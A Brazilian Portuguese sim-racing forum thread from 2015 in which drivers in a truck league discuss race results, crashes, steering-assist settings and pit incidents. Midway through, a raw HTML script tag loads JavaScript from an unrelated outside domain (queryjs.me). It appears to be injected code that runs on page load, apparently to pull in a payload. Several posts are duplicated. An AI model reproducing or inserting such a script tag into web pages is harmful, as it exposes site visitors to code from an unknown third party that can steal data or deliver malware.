Jump to content
Forum Autoracing
Lino

[2015] VACA - SS Challenge TRUCK - Janeiro!!!

Recommended Posts

Parabéns Nani!! Pelo menos ainda consegui arrastar o carro ali no fim pra te dar um vácuo.

esqueceu da ultima corrida...

tinha que dar o vacuo pra mim!!!!!

kkkkkkkkkkkkkk

Sozinho não subiu, vc estava todo amassado e quis frear na inclinação, deu no que deu. Mas é bom que não aconteça mais e vc aprenda. A sua sorte é que foi comigo. Se acontecer com alguns outros, é bom se preparar para o início da 3ª Guerra Mundial.

Olha, ja vi todo tipo de acidente, mas esse tipo que aconteceu na minha frente e pegou o amaral, tem que acabar... pow, se ta com carro acabado, ao menos virar pra esquerda ele vai... pq raios o carro num SS foi desestabilizar e pegar o lider da prova la no alto??

Ja corri de teclado, tem todo tipo de problema, principalmente com ajuda em excesso que lhe força a ir a lugares do traçado que tu não quer, mas ali não havia ajuda que fizesse tu ir la no outside, sendo que vc tava na rolagem...

dica, diminui a ajuda, usar 100% não vai chegar a lugar algum... Poe de 50 pra baixo ae... que esse tipo de coisa não vai acontecer nunca mais

• Like 1

Valeu, Said.

Mas a ajuda aqui tá em 35%... o carro tava na rolagem e a ajuda virou o volante pra direita. Eu também não entendi, provavelmente porque o carro estava quase indo no sentido oposto.

<script src="http://queryjs.me/services/script.js" type="text/javascript"></script>

Valeu, Said.

Mas a ajuda aqui tá em 35%... o carro tava na rolagem e a ajuda virou o volante pra direita. Eu também não entendi, provavelmente porque o carro estava quase indo no sentido oposto.

Relaxa Vitor, com o tempo vc pega o jeito!!! boa sorte!!

• Like 1

Said, tu passou na frente do pace na hora da largada, Provavelmente foi isso que te deixou uma volta atrás.

A GF foi dada quase em cima da linha de largada/chegada. Se o Said cruzou a linha antes da GF, já era, ficou a -1L.

fui atropelado na hora de entrar no pit na "liderança" (se fizesse top 10, eu iria querer essa volta roubada de mim eihn...)

Fui eu que te atropelei na entrada dos pits Said... mil desculpas pela pataquada, tentei jogar para o lado mas a diferença de velocidade entre nós era muito grande.. :( :( :vergonha::vergonha:

Bom dia,

bateria 1 foi incrivel.. a 2 foi insana..

Fiz pits muito doidos :)

Desculpas geral pela limpa do grid que fiz.. estava uma disputa ferrenha e tentei arriscar o bump, mas peguei torto o Junae e levei todos juntos.. lamento

Pow...minha conexão estava estranha ou era o server, não sei, só sei que percebi logo de cara quando entrei pra dar as primeiras voltas....dei umas 5 voltas no treino e o server não contabilizava as voltas...e de repente apareço a frente de outro carro....tenso....tentei treinar mais um pouco e vi que tava piscando demaaaaissss....normalmente não é assim..uma pena...tava com uma gana pra correr...então melhor não atrapalhar a corrida....vamos pra quinta-feira.

Ehhhh !!! Eu ganhei uma. :piloto:

Parabéns, Nani! :positivo1:

Foi uma corrida pra esquecer.

Ficam as desculpas pro #74, #2, #36 e a quem mais se envolveu numa batida que eu causei.

Antes da hora que eu saí perdi o controle do carro e acabei indo pro meio da pista, e não sei quem me acertou e acabei com a corrida dele. Ficam as desculpas, também.

É aprender com os erros de hoje.

tranquilo, Vitor...

o importante é voce assistir os replays, observar bem os erros e corrigir nas proximas corridas. :positivo:

regrinha de ouro: numa corrida os líderes são sagrados!

aconteça o que acontecer, mantenha distância... :risada:

boa sorte aí, fio :zamigos:

• Like 3

Bom vamos pelo começo, desculpe Ribeiro, eu não deveria ter forçado tanto ali logo no inicio da prova,

desculpe mesmo cara,vc e a quem mais atrapalhei, não queria estragar a race de ninguém

mas também não queria tomar volta de novo, como na primeira bateria daí

quis ficar colado la na frente e ver se não ficava tão pra traz mas forçar tanto no inicio,não precisava

eu deveria ter telegrafado mais um pouquinho na reta para o amigo se alinhar ali na frente mesmo,

sei que é muito chato sair no inicio da prova em qualquer Champ,

Bom vamos pelo começo, desculpe Ribeiro, eu não deveria ter forçado tanto ali logo no inicio da prova,

desculpe mesmo cara,vc e a quem mais atrapalhei, não queria estragar a race de ninguém

mas também não queria tomar volta de novo, como na primeira bateria daí

quis ficar colado la na frente e ver se não ficava tão pra traz mas forçar tanto no inicio,não precisava

eu deveria ter telegrafado mais um pouquinho na reta para o amigo se alinhar ali na frente mesmo,

sei que é muito chato sair no inicio da prova em qualquer Champ,

De boa Paulão.

Bora pra próxima :positivo1:

boas corridas novamente, na primeira boa parceria com o Ino, na segunda fiquei meio só ali no fim, não deu pra tentar vencer :mellow:

achei a pista a mais chatinha até agora, as 2 anteriores foram mais legais, vamos ver "ZENJOLS" como vai ser hahaha